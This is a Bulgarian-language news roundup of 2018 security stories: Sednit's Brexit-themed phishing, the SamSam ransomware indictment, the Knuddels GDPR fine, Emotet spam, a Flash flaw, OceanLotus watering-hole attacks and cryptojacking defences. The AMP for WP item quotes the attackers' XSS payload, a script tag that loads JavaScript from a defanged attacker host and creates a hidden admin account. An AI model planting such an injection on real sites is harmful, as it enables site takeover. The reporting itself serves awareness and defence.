Информационна сигурност

Последен ъпдейт на 3 декември 2018 в 09:05 ч.

Хакерската група Sednit използва събитията около Brexit, за да разпространява малуер. Сред основните цели на групата са държавни институции в Централна Азия и Централна и Източна Европа.

В момента членовете на Sednit водят активна спам кампания, показва анализ на компанията за информационна сигурност Accenture Security. Имейлите съдържат зловреден документ Brexit 15.11.2018.docx, чието име заблуждава, че има връзка с преговорите между Великобритания и Европейския съюз. „Темата за Brexit подсказва кои са целите на групата, която се фокусира основно върху страни-членки на NATO, страни в Централна Азия и съседни на Русия страни“, коментират от Accenture Security.

В прикачения документ има макро скрипт, който сваля на компютъра истинския малуер – в случая Zekapab, известен още и като Zebrocy. Зловредният код събира информация от заразеното устройство като средство за шпионаж. Според компанията за киберсигурност ESET малуерът се използва активно поне от няколко години и постоянно еволюира.

За Sednit се предполага, че е свързана с руското разузнаване. Групата се счита за автор на някои значими атаки, включително и такива срещу държавни институции. Според ESET първата хакерска атака с UEFI руткит е дело именно на Sednit.

За атаката, станала известна като LoJax, беше съобщено в края на септември. Tя се отличава с това, че атакува UEFI на устройството и може да устои на смяна на операционната система и дори смяна на твърдия диск на заразения компютър. Според ESET основна цел на атаката с UEFI руткит са държавни институции от Централна и Източна Европа.

Актуалната спам кампания не се различава съществено от други подобни, извършвани от групата. Тя обаче показва, че членовете на Sednit продължават да са активни. „Предвид предполагаемата връзка с Русия, очевидно групата разполага с достатъчно ресурси, за да атакува организации. Ето защо са необходими инвестиции в защитни мерки“, коментират от Accenture Security.

Американското правосъдно министерство обвини двама ирански граждани за организиране на рансъмуер кампанията SamSam, Досега тя е ощетила частни и държавни институции по цял свят с поне 30 млн. долара, твърди обвинението.

Заподозрени за автори на SamSam са Фарамарз Шахи Саванди и Мохамед Мехди Шах Мансури. Според обвинението те са създали първата версия на SamSam в края на 2015 и са започнали да проучват организации, които да атакуват.

„Заподозрените са използвали малуер, за да нанаесат щети за над 30 млн. долара на над 200 институции. Според обвинението заподозрените са пробили компютърни системи в 10 американски щата, както и Канада, и са искали откуп. Криминалната им дейност е ощетила държавни агенции, общински власти, болници и безброй невинни жертви“, коментира зам.главният прокурор Род Розенстийн.

В търсене на слаби места

Голяма част от рансъмуер кампаниите таргетират безразборно десетки и дори стотици хиляди потребители. SamSam се отличава с това, че атакува конкретни организации. За да постигнат това, неговите автори първо намират организации със слабо място. В повечето случаи това е уязвим компютър, който използва RDP(Remote Desktop Protocol) за отдалечен достъп.

Уязвимият компютър се използва като входна точка, през която SamSam се вмъква в компютърната мрежа на организацията и криптира данните, намиращи се на свързаните устройства. За да бъдат декриптирани, жертвите трябва да платят откуп, чийто размер може да варира от няколко хиляди долара до 50 хил. долара.

Обвинението твърди, че следвайки този модел Шахи Саванди и Мехди Шах Мансури са спечелили над 6 млн. долара от събрани откупи.

Нов криминален бизнес модел

SamSam е в основата на нов бизнес модел в компютърната престъпност според едно от последните проучвания на компанията за киберсигурност Sophos. Именно SamSam е дал началото на таргетираните атаки срещу институции, при които размерът на исканите откупи може да стигне стотици хиляди долари и дори да надхвърли 1 млн. долара.

Според американското правосъдно министерство активност на SamSam за последно е засечена на 25 септември 2018 г. На тази дата с рансъмуер беше атакувано пристанището в Сан Диего.

Последен ъпдейт на 28 ноември 2018 в 10:54 ч.

Чат платформата Knuddels е първата компания в Германия, глобена за неспазване на изискванията на евродирективата GDPR. Глобата е в размер на 20 хил. евро. Наложена е, защото 1.8 млн. потребителски имена и пароли на нейни потребители бяха публикувани в интернет.

Кражбата на лични данни се е случила през юли 2018 г., твърди BleepingComputer. Knuddels не е криптирала по никакъв начин данните за достъп до потребителските профили. Tе са били откраднати  от сървърите й и качени в Pastebin, където традционно се публикуват крадени лични данни. Публикувани са и в облачната услуга Mega. Освен 1.8 млн. имена и пароли са изтекли и малко над 800 хил. имейл адреси.

Knuddels е информирала потребителите си и местните регулатори за пробива. „Данни за достъп на наши потребители бяха публикувани в интернет. Нямаме данни за злоупотреба. Въпреки това временно деактивирахме всички профили, чиито данни са изтекли“, съобщава компанията в публикация в своя форум от началото на септември.

GDPR влезе в сила в края на май 2018 г. и предвижда глоби до 20 млн. евро или 4% от годишния оборот на компанията (взима се по-голямото от двете) за неспазване на изискванията на директивата. При определяне размера на глобата се вземат различни фактори като брой на засегнатите потребители, превантивни мерки и взаимодействие с регулаторните органи.

Нови спам кампании заразяват компютрите с банковия малуер Emotet, показват данните на ESET и Forcepoint. Атаката се възползва от коледните празници, по време на които обикновено се отчита ръст в спам и фишинг кампниите.

Причината е, че хората очакват да получат имейли с промоционални оферти за покупки. Хакерите знаят това и изпращат зловредни имейли, маскирани като промоции.

Според Forcepoint в САЩ тече активна спам кампания с ваучери и поздравителни картички за Денят на благотворителността. Всъщност прикаченият в имейла файл съдържа скрипт, който сваля на компютъра малуер.

„В сравнение с предишни атаки, тази използва малко по-различен подход. В периода на Черния петък прикачените файлове са XML, въпреки че са направени да изглеждат като файлове с .doc разширение. Досега зловредните файлове бяха с разширение .doc или .pdf“, коментират от ESET. В началото на ноември компанията обяви рязко покачване на засечените зловредни имейли с Emotet.

Основните цели на настоящите кампании са Латинска Америка, САЩ, Германия, Великобритания и Южна Африка.

За съществуването на Emotet се знае поне от 2014 г. Една от основните му функции е да краде пароли за достъп до онлайн банкиране. Според американския център за борба с киберзаплахите US-CERT Emotet е „сред най-унищожителните и разходоемки заплахи, засягащи местните власти в САЩ“.

Независимо дали става дума за Emotet или друг зловреден код, коледните празници са време, в което трябва да отваряте имейли с повишено внимание. Прочетете нашия наръчник за разпознаване на фишинг атака.

Adobe съобщава за новооткрита критична уязвимост в популярния Flash Player. Тя е налична във всички версии на продукта до 31.0.0.148 и позволява отдалечено изпълнение на зловреден код на устройството на жертвата.

Уязвимостта е открита за пръв път на 13 ноември, но Adobe я обяви едва седмица по-късно. Това означава, че е възможно в този период уязвимостта да е била използвана, въпреки че от Adobe няма данни за злоупотреба. Теоретично уязвимостта може да бъде експлоатирана чрез зловреден Flash файл, намиращ се на създаден за целта сайт.

Flash Player е известен със своите уязвимости, затова повечето интернет браузъри изискват изрично съгласие на потребителя, преди да зареждат Flash файлове. Уязвимостта на плейъра е една от причините, поради които популярността му намаля значително през последните години. В същото време възходът на алтернативни технологии като HTML5 и WebGL доведе до това, че Adobe реши да прекрати поддръжката на Flash Player към края на 2020 г.

Според Джон Дън от Naked Security обаче дори и това няма да убие окончателно Flash Player: така, както Windows XP продължава да се използва 4 години, след като поддръжката на операционната система беше спряна. Това означава, че Flash Player ще продължи да е вектор на атака и потребителите ще трябва да внимават.

„Историята ни учи да сме реалисти. Flash най-вероятно ще продължи да съществува като зомби технология. И то дълги години, след като Adobe си измие ръцете и спре да я поддържа“, коментира Дън.

Уязвимост в популярния плъгин AMP For WP се експлоатира активно, съобщава Wordfence. Приставката, която се използва от поне 100 хил. уебмастъри, позволява създаване на администраторски акаунти и превземане на сайтове.

AMP For WP се използва от администраторите, за да оптимизират сайтовете си за мобилни устройства. На 17 ноември се появи предупреждение, че в плъгина има уязвимост. Тя позволява на регистриран в сайта потребител да създаде акаунт с администраторски права.

@TenableSecurity RE: https://t.co/4bOEVDebIr
Many exploits were discovered by me when I wanted to fix a bug, not @webarx_security. I just never released how to exploit it, because that’s in vain. See https://t.co/01pfQh6Sui for details, which I submitted after the fix went live.

— Sybre Waaijer (@SybreWaaijer) November 17, 2018

Според Wordfence тази уязвимост вече се експлоатира с XSS атака, при която авторът се опитва да инжектира зловреден код в набелязания сайт. При повечето засечени атаки инжектираният код изглежда така: <script src=https://sslapis[.]com/assets/si/stat.js></script>. 

Ако скриптът бъде зареден от браузъра на администратора, той създава нов потребител supportuuser с администраторски права, който е под контрола на авттора на скрипта.

„Тази малуер кампания показва, че статичните XSS уязвимости все още са заплаха. Ако хакерът може да подкара зловреден код в браузъра на администратора на сайта, той може да използва цял набор от техники, с които да поеме контрола над сайта“, коментират от Wordfence.

Преди по-малко от две седмици Wordfence съобщи за уязвимост в друг плъгин, която също позволява превземане на сайтове.

Средният разход, който една компания плаща при пробив на своята информационна сигурност, се е повишил с 10% за последните 5 години. Стойността му вероятно ще продължи да расте заради влизането в сила на GDPR. Това са два от изводите в последното годишно проучване на Ponemon Institute.

Компаниите плащат средно по 3.86 млн. долара за пробив в информационната си сигурност. За последните 5 години този разход се е вдигнал с 10% или средно по 360 хил. долара на компания.

Къде е най-скъпо

Най-високите разходи са в САЩ. Там една компания плаща средно по 7.91 млн. долара, за да се справи с пробив в информаицонната си сигурност.

Това частично се дължи на факта, че американските компании плащат най-високите в света разходи за докладване на пробивите. Докато в страни като Индия средната сума е 20 хил. долара, в САЩ тя достига 740 хил. за компания. Причина за високите стойности в САЩ са регулаторните изисквания.

Според Ponemon Institute подобен ефект върху разходите ще има и евродирективата GDPR, която влезе в сила в края на май 2018 г. Тя засяга всички компании, които оперират на територията на Европейксия съюз. „Разходите за докладване в САЩ са високи заради американските регулации. Очакваме, че GDPR ще доведе до огромно увеличение за компаниите от цял свят в разходите за докладване при пробив“, коментират от Ponemon Institute.

Тенденция към покачване

Изследването е проведено сред 477 компании от 15 страни и региона на света. Всяка от тях е претърпяла пробив на данни през изминалите 12 месеца до юли. В анкетата влизат компании от сферата на здравеопазването, финансите, технологиите и комуникациите, търговията, фармацевтиката, енергетиката и др.

Средните разходи за 2018 г. дори не са най-високите за периода, откакто се води проучването. През 2016 г. например средният разход, причинен от пробив в информационната сигурност, е 4 млн. долара.

Като цяло обаче тенденцията е към трайно покачване. „Нашето проучване показва, че година след година информационните пробиви струват все по-скъпо на компаниите и все повече потребителски данни биват откраднати“, посочват от Ponemon Institute.

Защо разходите са все по-високи

Кои фактори оказват най-голямо влияние върху цената, която бизнесът плаща при пробив на данни? От Ponemon Institute посочват пет основни такива.

• Неочаквана загуба на клиенти след пробива – всеки пробив намалява доверието на клиентите в компанията, а с това намалява и тяхната лоялност. Ето защо компаниите, които имат назначен директор по сигурността на информацията, отчитат по-малки разходи при прибив на данни;
• Обем на откраднатите данни – колкото повече данни са откраднати, толкова по-скъпо излиза това на засегнатата компания;
• Време за откриване на пробива – колкото по-бързо една компания открие и се погрижи за пробива, толкова по-ниски ще са разходите й за покриването му;
• Ефективно управление на превантивните мерки – компаниите, които инвестират в превантивни мерки – дали ще са инструменти за засичане на пробиви или екипи, които се занимават със сигурността на данните – отчитат по- ниски разходи;
• Ефективно управление на разходите след пробива – такива са разходите за обслужване на клиентите, комуникация с клиенти и медиите, издаване на нови акаунти и т.н. Тези разходи се правят, след като е ясно какъв е мащабът на пробива и какви данни са пострадали. Ако компанията ги направи преди това, има опасност парите да са хвърлени напразно, което увеличава общата цена на пробива;

Хакерската група OceanLotus е организирала масирана шпионска кампания в Югоизточна Азия, показва проучване на ESET. Авторите на атаката са успели да компрометират 21 сайта, включително на две министверства в Камбоджа и на една от най-популярните медии във Виетнам. В хакнатите сайтове те са инсталирали зловреден код, който им е позволил да събират даннни за аудиториите им.

„Става дума за т.нар. watering hole атака, при която се инфектират със зловреден код сайтове с определена аудитория. По този начин може да се таргетират потребители с конкретен демографски профил“. коментират от ESET.

Името watering hole идва от тактиката на някои хищници да чакат в засада жертвите си близо до водоизточници. По същия начин злонамерено лице може да хакне сайта на някоя от регионалните медии, за да може да събере информация за живущите в конкретно населено място.

Един от хакнатите от OceanLotus сайтове е именно страницата на виетнамския вестник Dan Viet, който е 110-ият най-четен в страната според данните на Alexa. Хакнати са още сайтовете на две министерства в Камбоджа, както и сайтове на медии и блогове.

За OceanLotus се знае поне от 2012 г. Според компанията за киберсигурност FireEye членовете на групата са свързани с Виетнам. През 2017 г. OceanLotus беше обявена за автор на шпионска кампания в Югоизточна Азия, използваща същата тактика watering hole. Това, както и редица сходства с атаката през 2017 г., дава основание на експертите от ESET да твърдят, че OceanLotus стои и зад сегашната кампания.

Хакерите са инжектирали в компрометираните сайтове JavaScript код, с който са събирали информация за посетителите. Сред събираните данни са  IP адрес, езикови настройки на браузъра, инсталирани браузърни добавки, часова зона и т.н. „Това показва, че OceanLotus не само продължава да е активна, но и постоянно обновява и надгражда инструментите, с които работи. Наблюденията ни показват, че тази атака е по-сложна в сравнение с предишните атаки на групата. Ето защо OceanLotus трябва да се следи отблизо“, коментират от ESET.

Кибератаките срещу институции вече не се правят с цел забавление или нанасяне на щети. Днес основният мотив са парите, като печалбата от една-единствена атака може да надхвърли 1 млн. долара.  Това заявиха участниците в конференцията по киберсигурност QuBit Conference Sofia 2018. Freedomonline.bg е медиен партньор на събитието.

В същото време прагът за навлизане в незаконната индустрия за компютърни престъпления е много нисък. Ако преди по-малко от 20 години за това са се изисквали сериозни технически умения, сега това не е необходимо.

Големи печалби срещу малка инвестиция

Дори и необучен човек може да стане престъпник, или да си намери хакер-наемник. Изисква се само малка инвестиция. „Инструментите са налице. Уменията са налице. Нужни са само 2-3000 долара, за да може някой да се занимава с компютърни престъпления“, заяви Питър Трейвън, специален агент на ФБР.

Пред голяма част от бизнеса и държавните институции стои въпросът не дали, а кога ще бъдат хакнати. Причината е, че всяка институция работи с лични данни и интелектуална собственост, а те струват пари. „3000 компании се регистрират в Силициевата долина всеки месец. Представете си колко много интелектуална собственост има в този регион“, заяви Ондрей Крехел от компанията за киберсигурност LIFARS.

Всеки е потенциална жертва

Жертви на кибератаки са болници, общински администрации, дори маркетингови компании, които обработват големи обеми лични данни. Въпреки това много фирми продължават да не се интересуват от собствената си информационна сигурност. „Компаниите все още отказват да възприемат идеята, че могат да станат жертви. Факт е обаче, че данните им могат да бъдат откраднати“, коментира Крехел. Той даде пример с американски университет, който е претърпял 15 пробива на информационните си системи, без служителите изобщо да разберат.

„Това е просто бизнес. А когато нещо прави пари, то расте много бързо“, допълва Борис Гончаров, главен стратег по киберсигурност в дружеството за инфомрационна сигурност Amatas.

Плащане на рекет вместо предпазливост

Една от основните заплахи пред бизнеса е рансъмуерът. Той е достъпен (можете да си наемете рансъмуер като услуга от някои от черните онлайн пазари) и ефективен, тъй като много компании предпочитат да си платят откупа, за да бъдат данните им дешифрирани.

Плащането на откуп противоречи на препоръките, давани от полицията и компаниите за информационна сигурност. Въпреки това много фирми се оказват принудени да платят, дори и ако исканата сума е в размер на стотици хиляди долари. Има случаи, в които компании са склонни да платят дори суми, които надхвърлят 1 млн. долара. „Когато информационните системи са напълно пречупени, а фирмата трябва да раздава заплати, тя няма друг избор, освен да плати“, посочва Крехел.

Съществуват много разновидности на рансъмуер и всяка от тях има потенциала да донесе значителни печалби на престъпниците. Само атаките с рансъмуера SamSam са донесли досега 6.5 млн.печалба според доклад на Sophos.

Друг проблем е, че дори платеният откуп да бъде проследен, блонкирането на трансфера е трудно, тъй като плащанията стават в криптовалути. Дигиталните портфейли на престъпниците са публични, но е трудно те да бъдат замразени, а платените откупи – върнати на жертвите. „Имахме случай, в който 8 млн. долара стояха в един портфейл в продължение на 2 седмици. Нямаше международна институция, която да замрази портфейла. Няма юрисдикция върху криптовалутите. Борсите не съдействат.“, коментира Крехел.

Атаките със софтуер за копаене на криптовалути (cryptojacking атаки) са сравнително нова заплаха за бизнеса. Целта им е да използват изчислителната мощ на устройствата във фирмата, за да копаят криптовалути. Проблемът е, че това може да доведе до по-бързото износване на хардуера и да увеличи размера на сметките за електричество.

През първата половина на 2018 г. компанията за информационна сигурност TrendMicro е засякла над 787 хил. опити за атаки с копачи на криптовалути, което е почти 10 пъти повече от същия период на 2017 г. Според анализ на Palo Alto Networks този тип атаки са донесли поне 143 млн. долара печалби на техните организатори.

Опасно безразличие

В същото време бизнесът продължава да пренебрегва тази заплаха, тъй като не вижда негативните ефекти. Такива обаче има.

„Щетите от зловредните копачи на криптовалути не са толкова видими като негативните ефекти от рансъмуера. Това обаче не означава, че фирмите не плащат за тези щети. Копачите на криптовалути крадат изчислителните ресурси на фирмата. Това може да се отрази върху състоянието на мрежата и доведе до амортизация на хардуера, което пък води до по-кратък полезен живот и по-високи разходи за електричество. Копачите на криптовалути са по-незабележима заплаха в сравнение с други форми на малуер. Ако останат под радара, това може да създаде фалшиво усещане за сигурност“, коментират от TrendMicro.

Много вектори на атака

Cryptojacking атаките могат да се случат по много и различни канали. Ето само няколко примера:

Сайтове, в които има скрипт за копаене на криптовалути;

Реклами, в които има вграден cryptojacking скрипт;

Cryptojacking скрипт, който се представя за нов аверсия на Flash Player;

Kомпютър, който използва незащитен отдалечен достъп чрез Remote Desktop Protocol;

Фишинг;

Как да намалите риска от cryptojacking атака

Обучения на служителите

Обучаването на служителите е превантивна мярка както срещу cryptojacking атаки, така и срещу други киберзаплахи. Когато те са инструктурани да не отварят имейли от съмнителен източник или потенциално опасни сайтове, това намалява риска за цялата фирма.

Защита на работните станции

Използвайте софтуер за защита и анализ на работните станции, за да следите активността им и да изолирате онези, в които установите проблем.

Софтуер за блокиране на реклами

Cryptojacking скриптовете могат да стигнат до компютъра през онлайн рекламите (включително и в сайтове като Youtube). Блокирането на онлайн рекламите с Ad blocker намалява риска от заразяване по този канал;

Защита на сървъри

Ако сървърите ви са уязвими, на тях може да се инсталира зловреден софтуер, който копае криптовалути и го натоварва. Използвайте софтуерни решения за защита на сървъри, както и базови правила за защита като силни пароли и многофакторна автентикация.

Политики на достъп

Задайте правила за достъп на служителите до информационни ресурси. Ограничавайки достъпа им до съмнителни сайтове, вие намалявате възможността за cryptojacking атака.